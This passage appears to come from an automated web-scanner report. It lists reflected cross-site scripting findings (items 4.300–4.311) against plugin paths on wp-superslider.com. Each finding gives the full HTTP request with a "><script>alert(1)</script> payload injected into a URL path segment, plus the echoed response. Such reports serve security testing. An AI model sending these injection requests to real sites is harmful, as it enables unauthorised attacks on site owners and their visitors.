<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase7487f\"><script>alert(1)</script>5f527290bee/default/tooltips.css" />
...[SNIP]...

4.300. http://wp-superslider.com/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/tooltips.css [REST URL parameter 8] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/tooltips.css

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d055"><script>alert(1)</script>7ce29bfd1af was submitted in the REST URL parameter 8. This input was echoed as 7d055\"><script>alert(1)</script>7ce29bfd1af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default7d055"><script>alert(1)</script>7ce29bfd1af/tooltips.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:29 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674550+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674550; expires=Thu, 02-Feb-2012 19:22:30 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:30 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default7d055\"><script>alert(1)</script>7ce29bfd1af/tooltips.css" />
...[SNIP]...

4.301. http://wp-superslider.com/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/tooltips.css [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/tooltips.css

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4353"><script>alert(1)</script>abe11ab9e4d was submitted in the REST URL parameter 9. This input was echoed as b4353\"><script>alert(1)</script>abe11ab9e4d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/tooltips.cssb4353"><script>alert(1)</script>abe11ab9e4d HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:31 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674551+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674551; expires=Thu, 02-Feb-2012 19:22:31 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:31 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/tooltips.cssb4353\"><script>alert(1)</script>abe11ab9e4d" />
...[SNIP]...

4.302. http://wp-superslider.com/site/wp-content/plugins/wp-downloadmanager/download-css.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/wp-downloadmanager/download-css.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 332e7"><script>alert(1)</script>e7708e26fdc was submitted in the REST URL parameter 1. This input was echoed as 332e7\"><script>alert(1)</script>e7708e26fdc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site332e7"><script>alert(1)</script>e7708e26fdc/wp-content/plugins/wp-downloadmanager/download-css.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:31 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674552+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674552; expires=Thu, 02-Feb-2012 19:22:32 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:32 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53345

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site332e7\"><script>alert(1)</script>e7708e26fdc/wp-content/plugins/wp-downloadmanager/download-css.css" />
...[SNIP]...

4.303. http://wp-superslider.com/site/wp-content/plugins/wp-downloadmanager/download-css.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/wp-downloadmanager/download-css.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1e60"><script>alert(1)</script>55e2caf15cd was submitted in the REST URL parameter 2. This input was echoed as b1e60\"><script>alert(1)</script>55e2caf15cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-contentb1e60"><script>alert(1)</script>55e2caf15cd/plugins/wp-downloadmanager/download-css.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:36 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674556+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674556; expires=Thu, 02-Feb-2012 19:22:36 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:36 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-contentb1e60\"><script>alert(1)</script>55e2caf15cd/plugins/wp-downloadmanager/download-css.css" />
...[SNIP]...

4.304. http://wp-superslider.com/site/wp-content/plugins/wp-downloadmanager/download-css.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/wp-downloadmanager/download-css.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload adaa5"><script>alert(1)</script>26cdf719bb4 was submitted in the REST URL parameter 3. This input was echoed as adaa5\"><script>alert(1)</script>26cdf719bb4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/pluginsadaa5"><script>alert(1)</script>26cdf719bb4/wp-downloadmanager/download-css.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:40 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674560+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674561; expires=Thu, 02-Feb-2012 19:22:41 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/pluginsadaa5\"><script>alert(1)</script>26cdf719bb4/wp-downloadmanager/download-css.css" />
...[SNIP]...

4.305. http://wp-superslider.com/site/wp-content/plugins/wp-downloadmanager/download-css.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/wp-downloadmanager/download-css.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd8c0"><script>alert(1)</script>b8bbb170bdf was submitted in the REST URL parameter 4. This input was echoed as dd8c0\"><script>alert(1)</script>b8bbb170bdf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/wp-downloadmanagerdd8c0"><script>alert(1)</script>b8bbb170bdf/download-css.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:42 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674562+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674562; expires=Thu, 02-Feb-2012 19:22:42 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/wp-downloadmanagerdd8c0\"><script>alert(1)</script>b8bbb170bdf/download-css.css" />
...[SNIP]...

4.306. http://wp-superslider.com/site/wp-content/plugins/wp-downloadmanager/download-css.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/wp-downloadmanager/download-css.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 867ca"><script>alert(1)</script>99896f8538 was submitted in the REST URL parameter 5. This input was echoed as 867ca\"><script>alert(1)</script>99896f8538 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/wp-downloadmanager/download-css.css867ca"><script>alert(1)</script>99896f8538 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:44 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674564+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674565; expires=Thu, 02-Feb-2012 19:22:45 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/wp-downloadmanager/download-css.css867ca\"><script>alert(1)</script>99896f8538" />
...[SNIP]...

4.307. http://wp-superslider.com/site/wp-content/plugins/wp-greet-box/js/functions.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/wp-greet-box/js/functions.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35227"><script>alert(1)</script>3dfa69234d3 was submitted in the REST URL parameter 1. This input was echoed as 35227\"><script>alert(1)</script>3dfa69234d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site35227"><script>alert(1)</script>3dfa69234d3/wp-content/plugins/wp-greet-box/js/functions.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:03 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674584+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674584; expires=Thu, 02-Feb-2012 19:23:04 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:04 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site35227\"><script>alert(1)</script>3dfa69234d3/wp-content/plugins/wp-greet-box/js/functions.js" />
...[SNIP]...

4.308. http://wp-superslider.com/site/wp-content/plugins/wp-greet-box/js/functions.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/wp-greet-box/js/functions.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37872"><script>alert(1)</script>78f3e31006f was submitted in the REST URL parameter 2. This input was echoed as 37872\"><script>alert(1)</script>78f3e31006f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content37872"><script>alert(1)</script>78f3e31006f/plugins/wp-greet-box/js/functions.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:05 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674585+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674585; expires=Thu, 02-Feb-2012 19:23:05 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:05 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content37872\"><script>alert(1)</script>78f3e31006f/plugins/wp-greet-box/js/functions.js" />
...[SNIP]...

4.309. http://wp-superslider.com/site/wp-content/plugins/wp-greet-box/js/functions.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/wp-greet-box/js/functions.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f66b5"><script>alert(1)</script>d1bdee06cb7 was submitted in the REST URL parameter 3. This input was echoed as f66b5\"><script>alert(1)</script>d1bdee06cb7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/pluginsf66b5"><script>alert(1)</script>d1bdee06cb7/wp-greet-box/js/functions.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:06 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674586+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674587; expires=Thu, 02-Feb-2012 19:23:07 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:07 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/pluginsf66b5\"><script>alert(1)</script>d1bdee06cb7/wp-greet-box/js/functions.js" />
...[SNIP]...

4.310. http://wp-superslider.com/site/wp-content/plugins/wp-greet-box/js/functions.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/wp-greet-box/js/functions.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed6b8"><script>alert(1)</script>914a3271a2e was submitted in the REST URL parameter 4. This input was echoed as ed6b8\"><script>alert(1)</script>914a3271a2e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/wp-greet-boxed6b8"><script>alert(1)</script>914a3271a2e/js/functions.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:08 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674588+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674588; expires=Thu, 02-Feb-2012 19:23:08 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:08 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/wp-greet-boxed6b8\"><script>alert(1)</script>914a3271a2e/js/functions.js" />
...[SNIP]...

4.311. http://wp-superslider.com/site/wp-content/plugins/wp-greet-box/js/functions.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/wp-greet-box/js/functions.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad51d"><script>alert(1)</script>5ca530811f6 was submitted in the REST URL parameter 5. This input was echoed as ad51d\"><script>alert(1)</script>5ca530811f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/wp-greet-box/jsad51d"><script>alert(1)</script>5ca530811f6/functions.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:09 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674589+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674589; expires=Thu, 02-Feb-2012 19:23:09 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:09 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53326

